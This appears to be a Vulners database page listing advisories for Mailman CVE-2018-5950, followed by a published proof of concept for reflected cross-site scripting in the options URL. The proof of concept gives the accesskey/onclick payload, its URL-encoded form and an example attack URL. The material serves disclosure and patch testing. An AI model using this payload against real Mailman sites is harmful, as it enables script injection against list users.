| Reporter | Title | Published | Views | Family All 77 |
|---|---|---|---|---|
| Mailman -- Cross-site scripting (XSS) vulnerability in the web UI | 20 Jan 201800:00 | – | freebsd | |
| Amazon Linux 2 : mailman (ALAS-2018-985) | 18 Apr 201800:00 | – | nessus | |
| Amazon Linux AMI : mailman (ALAS-2018-985) | 6 Apr 201800:00 | – | nessus | |
| CentOS 6 : mailman (CESA-2018:0504) | 15 Mar 201800:00 | – | nessus | |
| CentOS 7 : mailman (CESA-2018:0505) | 15 Mar 201800:00 | – | nessus | |
| Debian DLA-1272-1 : mailman security update | 9 Feb 201800:00 | – | nessus | |
| Debian DSA-4108-1 : mailman - security update | 12 Feb 201800:00 | – | nessus | |
| EulerOS 2.0 SP1 : mailman (EulerOS-SA-2018-1086) | 2 May 201800:00 | – | nessus | |
| EulerOS 2.0 SP2 : mailman (EulerOS-SA-2018-1087) | 2 May 201800:00 | – | nessus | |
| Fedora 27 : 3:mailman (2018-55b7018374) | 19 Mar 201800:00 | – | nessus |
`# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)
# Type: Reflected XSS
# Software: Mailman
# Version: >=1.x <= 2.1.23
# Vendor Homepage: https://www.list.org
# Original link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950
# POC Author: Valerio Alessandroni
# Date: 28/10/2020
# Description: Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL.
#
# https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS]
# Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload
#
# For this POC I used the following payload
# CVE: CVE-2018-5950
"accesskey%3d"x"onclick%3d"alert`XSS`"
# Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute.
# An URL Encoded version of the payload is
%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22
# URL Example:
https://127.0.0.1/cgi-bin/mailman/options/list_name/[email protected]%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22
# In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X
# where X is an arbitrary button inserted as accesskey attribute in the payload.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation